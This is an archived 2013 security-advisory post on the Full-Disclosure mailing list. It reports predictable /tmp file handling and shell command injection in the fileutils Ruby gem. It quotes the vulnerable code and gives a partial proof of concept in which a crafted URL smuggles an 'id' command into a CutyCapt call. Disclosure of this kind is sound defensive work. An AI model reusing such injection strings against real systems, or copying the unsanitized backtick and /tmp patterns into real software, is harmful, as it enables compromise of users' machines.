[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] Fileutils ruby gem possible remote command execution and insecure file handling in
From: "Larry W. Cashdollar" <larry0 () me ! com>
Date: 2013-02-28 14:01:16
Message-ID: 3af4145b-779c-497f-b895-8edd46314c57 () me ! com
[Download RAW message or body]
[Attachment #2 (multipart/alternative)]
Fileutils ruby gem possible remote command execution and insecure file handling in /tmp
2/23/2013
Hi list, I was looking at some gem files and noticed a few issues with fileutils-0.7
http://rubygems.org/gems/fileutils
"A set of utility classes to extract meta data from different file types".
Handles files insecurely in /tmp, a directory is created for that file extension say 'zip' and \
files are created/modified there. This directory can be hijacked and the contents manipulated \
by a malicious user.
in ./lib/file_utils.rb
15 def zip (target, *sources)
16 targetdir = "{FileUtils::Config.tmp_dir}/zip"
17 id = 1
18 while File.exists?(targetdir)
19 targetdir = "{FileUtils::Config.tmp_dir}/zip#{id}"
20 id += 1
21 end
22 FileUtils.mkdir(targetdir)
where Config.tmp_dir = /tmp
in ./lib/file_utils/config.rb
5 def self.tmp_dir
6 @tmp_dir ||= '/tmp'
7 end
Remote command execution:
From file_utils.rb, doesn't sanitize input on URLs passed to CutyCapt for execution. If a URL \
contains shell characters say a ';' followed by a command a remote attacker execute a command \
on the clients system if they are enticed to click an encoded url like:
need to test URL encoding not sure if this is valid.
http://bla.net.org;id>/tmp/o; -> http://tinyurl.com/a5scxzz
7 def capture (url, target)
8 command = FileUtils::Config::Xvfb.command(File.dirname(__FILE__) + \
"/../bin/CutyCapt --min-width=1024 --min-height=768 --url={url} --out={target}") 9 \
`#{command}` 10 end
partial PoC if client is tricked into using malicious URL:
irb(main):001:0> `xvfb-run --server-args="-screen 0,1024x768x24" ./CutyCapt \
--url=http://www.example.org;id>/tmp/foo; --out=/tmp/tempf` xvfb-run: error: Xvfb failed to \
start
sh: 1: --out=/tmp/tempf: not found
=> ""
irb(main):002:0>
root@ubuntu:~/CutyCapt/cutycapt/CutyCapt ls -l /tmp/foo
-rw-r--r-- 1 root root 39 Feb 27 02:56 /tmp/foo
root@ubuntu:~/CutyCapt/cutycapt/CutyCapt cat /tmp/foo
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~/CutyCapt/cutycapt/CutyCapt#
Michael Scherer of Redhat.com found other issues during a discussion about the above issues I \
found:
In fact, there is the same similar problem in another file :
result = `#{FileUtils::Config::OpenOffice.python} #{command} #{source} #{target} \
#{FileUtils::Config::OpenOffice.port}`
I quickly checked using irb ( a quick command line to type ruby snippet, and yes, using funky \
chars result in funky results.
There is another issue in
# Generates a temp filepath for the given extension def temp (extension)
path = "{FileUtils::Config.tmp_dir}/tmp.{extension}" id = 1
while File.exists?(path)
path = "{FileUtils::Config.tmp_dir}/tmp.{id}.#{extension}"
id += 1
end
Since someone could just create the file at the last moment, and make a link so the script \
would overwrite an arbitrary file.
Thanks to vl4dz and Michael.
Larry W. Cashdollar @_larry0
http://vapid.dhs.org
[Attachment #5 (multipart/related)]
[Attachment #7 (text/html)]
<html><body><div>Fileutils ruby gem possible remote command execution and insecure file \
handling in /tmp<br>2/23/2013<br><br>Hi list, I was looking at some gem files and noticed a few \
issues with fileutils-0.7<br><br>http://rubygems.org/gems/fileutils<br><br>"A set of utility \
classes to extract meta data from different file types".<br><br>Handles files insecurely in \
/tmp, a directory is created for that file extension say 'zip' and files are created/modified \
there. This directory can be hijacked and the contents manipulated by a malicious \
user.<br><br>in ./lib/file_utils.rb<br><br> 15 def zip (target, \
*sources)<br> 16 targetdir = \
"{FileUtils::Config.tmp_dir}/zip"<br> 17 \
id = 1<br> 18 while \
File.exists?(targetdir)<br> 19 \
targetdir = "{FileUtils::Config.tmp_dir}/zip#{id}"<br> 20 \
id += 1<br> 21 \
end<br> 22 \
FileUtils.mkdir(targetdir)<br><br>where Config.tmp_dir = /tmp<br><br>in \
./lib/file_utils/config.rb<br><br> 5 def \
self.tmp_dir<br> \
6 @tmp_dir ||= \
'/tmp'<br> 7 end<br><br>Remote command \
execution: <br><br>From file_utils.rb, doesn't sanitize input on URLs passed to CutyCapt for \
execution. If a URL contains shell characters say a ';' followed by a command a remote attacker \
execute a command on the clients system if they are enticed to click an encoded url \
like:<br><br> need to test URL encoding not sure if this is valid. \
<br><br>http://bla.net.org;id>/tmp/o; -> http://tinyurl.com/a5scxzz<br><br> \
7 def capture (url, target)<br> \
8 command = \
FileUtils::Config::Xvfb.command(File.dirname(__FILE__) + "/../bin/CutyCapt --min-width=1024 \
--min-height=768 --url={url} --out={target}")<br> \
9 \
`#{command}`<br> 10 end<br><br>partial PoC if client is tricked \
into using malicious URL:<br><br>irb(main):001:0> `xvfb-run --server-args="-screen \
0,1024x768x24" ./CutyCapt --url=http://www.example.org;id>/tmp/foo; --out=/tmp/tempf` \
xvfb-run: error: Xvfb failed to start<br>sh: 1: --out=/tmp/tempf: not found<br>=> \
""<br>irb(main):002:0><br><br>root@ubuntu:~/CutyCapt/cutycapt/CutyCapt ls -l /tmp/foo \
<br>-rw-r--r-- 1 root root 39 Feb 27 02:56 /tmp/foo \
<br>root@ubuntu:~/CutyCapt/cutycapt/CutyCapt cat /tmp/foo <br>uid=0(root) gid=0(root) \
groups=0(root)<br>root@ubuntu:~/CutyCapt/cutycapt/CutyCapt#<br><br>Michael Scherer of \
Redhat.com found other issues during a discussion about the above issues I found:<br><br>In \
fact, there is the same similar problem in another file :<br>result = \
`#{FileUtils::Config::OpenOffice.python} #{command} #{source} #{target} \
#{FileUtils::Config::OpenOffice.port}`<br><br>I quickly checked using irb ( a quick command \
line to type ruby snippet, and yes, using funky chars result in funky results.<br><br>There is \
another issue in<br># Generates a temp filepath for the given extension def temp \
(extension)<br><br>path = "{FileUtils::Config.tmp_dir}/tmp.{extension}" id = 1<br>while \
File.exists?(path)<br><br> path = \
"{FileUtils::Config.tmp_dir}/tmp.{id}.#{extension}"<br> \
id += 1<br><br>end<br><br>Since someone could just create the file at the last moment, and make \
a link so the script would overwrite an arbitrary file.<br><br>Thanks to vl4dz and \
Michael.<br><br>Larry W. Cashdollar @_larry0<br>http://vapid.dhs.org <br \
data-mce-bogus="1"></div></body></html>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic